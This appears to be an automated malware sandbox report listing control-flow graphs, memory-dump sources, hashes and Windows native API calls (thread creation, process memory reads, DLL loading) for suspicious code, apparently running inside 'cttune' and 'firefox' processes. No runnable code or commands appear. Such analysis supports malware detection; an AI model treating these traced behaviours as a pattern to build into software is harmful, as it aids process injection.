                                                                                          control_flow_graph 0 4ceedd6-4ceedfb 1 4ceedfd-4ceee14 call 4cf0fe8 0->1 2 4ceee19-4ceee39 call 4cf1008 call 4cece48 0->2 1->2 8 4ceee3f-4ceef3f call 4ceed08 call 4cf1008 call 4cf4f14 call 4ce0398 call 4cf05b8 call 4ce0398 call 4cf05b8 call 4cf2cd8 2->8 9 4cef3eb-4cef3f6 2->9 26 4cef3df-4cef3e6 call 4ceed08 8->26 27 4ceef45-4ceefd3 call 4ce0398 call 4cf05b8 NtQueryInformationProcess call 4cf1008 call 4ce0398 call 4cf05b8 8->27 26->9 39 4ceefe7-4cef05d call 4cf4f22 call 4ce0398 call 4cf05b8 27->39 40 4ceefd5-4ceefe2 27->40 39->40 49 4cef063-4cef072 call 4cf4f4c 39->49 40->26 52 4cef0bf-4cef0ff call 4ce0398 call 4cf05b8 call 4cf3618 49->52 53 4cef074-4cef0ba NtReadVirtualMemory call 4cf1cf8 49->53 62 4cef11e-4cef20e call 4ce0398 call 4cf05b8 call 4cf4f5a call 4ce0398 call 4cf05b8 call 4cf2ff8 call 4cf0fb8 * 3 call 4cf4f4c 52->62 63 4cef101-4cef119 52->63 53->26 86 4cef23b-4cef253 call 4cf4f4c 62->86 87 4cef210-4cef239 call 4cf4f4c call 4cf0fb8 call 4cf4fae call 4cf4f68 62->87 63->26 93 4cef27f-4cef291 call 4cf1c38 86->93 94 4cef255-4cef27a call 4cf27a8 86->94 98 4cef296-4cef2a0 87->98 93->98 94->93 100 4cef35c-4cef3bf call 4ce0398 call 4cf05b8 call 4cf3928 98->100 101 4cef2a6-4cef2f0 call 4ce0398 call 4cf05b8 call 4cf3308 call 4cf4f4c 98->101 100->26 125 4cef3c1-4cef3d6 100->125 120 4cef322-4cef32a call 4cf4f4c 101->120 121 4cef2f2-4cef318 call 4cf4ff8 call 4cf4fae 101->121 120->100 129 4cef32c-4cef337 120->129 121->120 125->26 128 4cef3da call 4cf0fe8 125->128 128->26 129->100 132 4cef339-4cef357 call 4cf3c38 129->132 132->100
                                                                                          APIs
                                                                                          • NtQueryInformationProcess.NTDLL ref: 04CEEF87
                                                                                          • NtReadVirtualMemory.NTDLL ref: 04CEF08F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5167666035.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4ce0000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                          • String ID: 0$@UWH
                                                                                          • API String ID: 1498878907-4251425181

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 134 4ceedd8-4ceedfb 135 4ceedfd-4ceee14 call 4cf0fe8 134->135 136 4ceee19-4ceee39 call 4cf1008 call 4cece48 134->136 135->136 142 4ceee3f-4ceef3f call 4ceed08 call 4cf1008 call 4cf4f14 call 4ce0398 call 4cf05b8 call 4ce0398 call 4cf05b8 call 4cf2cd8 136->142 143 4cef3eb-4cef3f6 136->143 160 4cef3df-4cef3e6 call 4ceed08 142->160 161 4ceef45-4ceefd3 call 4ce0398 call 4cf05b8 NtQueryInformationProcess call 4cf1008 call 4ce0398 call 4cf05b8 142->161 160->143 173 4ceefe7-4cef05d call 4cf4f22 call 4ce0398 call 4cf05b8 161->173 174 4ceefd5-4ceefe2 161->174 173->174 183 4cef063-4cef072 call 4cf4f4c 173->183 174->160 186 4cef0bf-4cef0ff call 4ce0398 call 4cf05b8 call 4cf3618 183->186 187 4cef074-4cef0b5 NtReadVirtualMemory call 4cf1cf8 183->187 196 4cef11e-4cef20e call 4ce0398 call 4cf05b8 call 4cf4f5a call 4ce0398 call 4cf05b8 call 4cf2ff8 call 4cf0fb8 * 3 call 4cf4f4c 186->196 197 4cef101-4cef119 186->197 190 4cef0ba 187->190 190->160 220 4cef23b-4cef253 call 4cf4f4c 196->220 221 4cef210-4cef239 call 4cf4f4c call 4cf0fb8 call 4cf4fae call 4cf4f68 196->221 197->160 227 4cef27f-4cef291 call 4cf1c38 220->227 228 4cef255-4cef27a call 4cf27a8 220->228 232 4cef296-4cef2a0 221->232 227->232 228->227 234 4cef35c-4cef3bf call 4ce0398 call 4cf05b8 call 4cf3928 232->234 235 4cef2a6-4cef2f0 call 4ce0398 call 4cf05b8 call 4cf3308 call 4cf4f4c 232->235 234->160 259 4cef3c1-4cef3d6 234->259 254 4cef322-4cef32a call 4cf4f4c 235->254 255 4cef2f2-4cef318 call 4cf4ff8 call 4cf4fae 235->255 254->234 263 4cef32c-4cef337 254->263 255->254 259->160 262 4cef3da call 4cf0fe8 259->262 262->160 263->234 266 4cef339-4cef357 call 4cf3c38 263->266 266->234
                                                                                          APIs
                                                                                          • NtQueryInformationProcess.NTDLL ref: 04CEEF87
                                                                                          • NtReadVirtualMemory.NTDLL ref: 04CEF08F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5167666035.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4ce0000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                          • String ID: 0
                                                                                          • API String ID: 1498878907-4108050209

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 282 4a02cf0-4a02cfc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 281 4a02c30-4a02c3c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 283 4a02d10-4a02d1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 272 4a029f0-4a029fc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 274 4a02a80-4a02a8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 275 4a02ac0-4a02acc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 2341ec47146f10176bb87150c0db6075e7d42b35467c009f96333eed5ec62113
                                                                                          • Instruction ID: 534ee257a59452830f2969c06d61385eb63d967eb7ebe2b609e438d0e6fc4362
                                                                                          • Opcode Fuzzy Hash: 2341ec47146f10176bb87150c0db6075e7d42b35467c009f96333eed5ec62113
                                                                                          • Instruction Fuzzy Hash: 8790023160500802F5507558451474610058BD0385F51C419A0015655DC769DA5676A1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 273 4a02a10-4a02a1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: db077174a9ea77324afbde53436b3c2c57e8b35ec878890b9afa1eb5b6b2b216
                                                                                          • Instruction ID: 4a450d6cc304446b33dbc4b8f64e14ef78ee975fc41acdd2ba72eda9a405d55f
                                                                                          • Opcode Fuzzy Hash: db077174a9ea77324afbde53436b3c2c57e8b35ec878890b9afa1eb5b6b2b216
                                                                                          • Instruction Fuzzy Hash: 40900225221000022545B958070450B14459BD63D5391C41DF1407591CC635D8666321

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 278 4a02b80-4a02b8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 05fef640381e158cbdaee1d8103f119e83b674c6670df98255443200ac3269f5
                                                                                          • Instruction ID: b37d3d6ca229dc174c9dc961241e8a2be44787bb846873fe0cc1f4e0c48f1415
                                                                                          • Opcode Fuzzy Hash: 05fef640381e158cbdaee1d8103f119e83b674c6670df98255443200ac3269f5
                                                                                          • Instruction Fuzzy Hash: BF90023120100842F50075584504B4610058BE0385F51C41EA0115655DC629D8527521

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 279 4a02b90-4a02b9c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f9a09b5f433b52cebbaaf4b26b2eca6a1cd0f7c62f3692ec407dea9dd3ae10e8
                                                                                          • Instruction ID: 6c760d169e10552077e15057d551ce3c4481098d88c26055731e490b5d574805
                                                                                          • Opcode Fuzzy Hash: f9a09b5f433b52cebbaaf4b26b2eca6a1cd0f7c62f3692ec407dea9dd3ae10e8
                                                                                          • Instruction Fuzzy Hash: B190023120108802F5107558850474A10058BD0385F55C819A4415659DC6A9D8927121

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 280 4a02bc0-4a02bcc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 75156cdf544289457202eff44f3909957b74ce66d65079aa70719985e9a48152
                                                                                          • Instruction ID: a88c46dd2d16235153be67cd48009e740d3f1839a0be7a461bc54ed983700d0a
                                                                                          • Opcode Fuzzy Hash: 75156cdf544289457202eff44f3909957b74ce66d65079aa70719985e9a48152
                                                                                          • Instruction Fuzzy Hash: 8690023120100402F5007998550864610058BE0385F51D419A5015556EC679D8927131

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 276 4a02b00-4a02b0c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c72bbd3fe160b751cb852a732827894bf999157825a88750eca51900b104daaa
                                                                                          • Instruction ID: bd12f227db0c147f9a0b36e0247714b382d78fc0ee733dd7fa3f53016036dd73
                                                                                          • Opcode Fuzzy Hash: c72bbd3fe160b751cb852a732827894bf999157825a88750eca51900b104daaa
                                                                                          • Instruction Fuzzy Hash: C790023120504842F54075584504A4610158BD0389F51C419A0055695DD639DD56B661

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 277 4a02b10-4a02b1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 1ed716776c32b196f7a2b5db776f7596f2f815e381706a0e122023517d4094ef
                                                                                          • Instruction ID: b066a2c4fff941c9a55d0ceff6e13d79a2407564f0fcd3e68a4bd99113db2eed
                                                                                          • Opcode Fuzzy Hash: 1ed716776c32b196f7a2b5db776f7596f2f815e381706a0e122023517d4094ef
                                                                                          • Instruction Fuzzy Hash: E890023120100802F5807558450464A10058BD1385F91C41DA0016655DCA29DA5A77A1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c271f465bfee9bbd5a8ce592499243568757e6be8178752f2e54e08e619c18bb
                                                                                          • Instruction ID: bd03235308325133e692ec5326d24ba46be71afb44a4abb5262f36b9d37f376b
                                                                                          • Opcode Fuzzy Hash: c271f465bfee9bbd5a8ce592499243568757e6be8178752f2e54e08e619c18bb
                                                                                          • Instruction Fuzzy Hash: AC90023160510402F5007558461470620058BD0285F61C819A0415569DC7A9D95275A2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 268 4a02b2a-4a02b2f 269 4a02b31-4a02b38 268->269 270 4a02b3f-4a02b46 LdrInitializeThunk 268->270
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 069e1814bd6df6fb828663c426946397eaa6b883290aa33a2427b78bbe967ec2
                                                                                          • Instruction ID: 0bff7645d47ef5440ef3389d6f461b86208f82dff9b7f9addaa5729c544dbe74
                                                                                          • Opcode Fuzzy Hash: 069e1814bd6df6fb828663c426946397eaa6b883290aa33a2427b78bbe967ec2
                                                                                          • Instruction Fuzzy Hash: B1B09B72D015C5C5FB11EF60570C7177900ABD1745F15C455D1460685E473CD491F175
                                                                                          Strings
                                                                                          • Execute=1, xrefs: 04A3451E
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A3454D
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A34460
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A34507
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A34530
                                                                                          • ExecuteOptions, xrefs: 04A344AB
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A34592
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: f58a3aa10969172673c8f07d0ed0fec74ac5ed34b059e33393ee791e09b1002f
                                                                                          • Instruction ID: 901b106901640e13fa15b9f08f98293fcb1e5a6bbf626a6cb6a5b486453a225d
                                                                                          • Opcode Fuzzy Hash: f58a3aa10969172673c8f07d0ed0fec74ac5ed34b059e33393ee791e09b1002f
                                                                                          • Instruction Fuzzy Hash: 8851D431A002196AEF10AFE4ED95FAE73ADEF48714F0404F9E605A7181E670BE45CF61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          • API String ID: 0-1194432280
                                                                                          • Opcode ID: 4b2042a707ae4d8f7e242ccd942b9c46218b2acbe0da1bfcd46ca90e5ee5b4cc
                                                                                          • Instruction ID: 1dce0ea6835ddeae8939b1ff7f2f1634d9fa0b78dda7d743941e2d284e28ee5c
                                                                                          • Opcode Fuzzy Hash: 4b2042a707ae4d8f7e242ccd942b9c46218b2acbe0da1bfcd46ca90e5ee5b4cc
                                                                                          • Instruction Fuzzy Hash: 7D814CB2D002699BDB35CF54CD44BEEB6B8AF48714F0041EAE909B7250E7706E85DFA1

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:26
                                                                                          Total number of Limit Nodes:5
                                                                                          execution_graph 4972 20832dea8c2 4974 20832dea8f0 4972->4974 4973 20832dea8f4 4974->4973 4975 20832dea930 LdrLoadDll 4974->4975 4976 20832dea94c 4974->4976 4975->4976 4995 20832de07f3 4996 20832de07ff 4995->4996 4997 20832de075e 4996->4997 4998 20832de08e7 CreateThread 4996->4998 4977 20832de149a 4980 20832de14c4 4977->4980 4978 20832de1555 4979 20832de14eb SleepEx 4979->4980 4980->4978 4980->4979 4991 20832de07da 4992 20832de07ff 4991->4992 4993 20832de075e 4991->4993 4992->4993 4994 20832de08e7 CreateThread 4992->4994 4981 20832dece29 4983 20832dece31 4981->4983 4982 20832decdd8 4983->4982 4985 20832decf24 4983->4985 4987 20832de0868 4983->4987 4985->4982 4986 20832decf92 ExitProcess 4985->4986 4989 20832de0892 4987->4989 4988 20832de0915 4988->4985 4989->4988 4990 20832de08e7 CreateThread 4989->4990 4990->4985

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0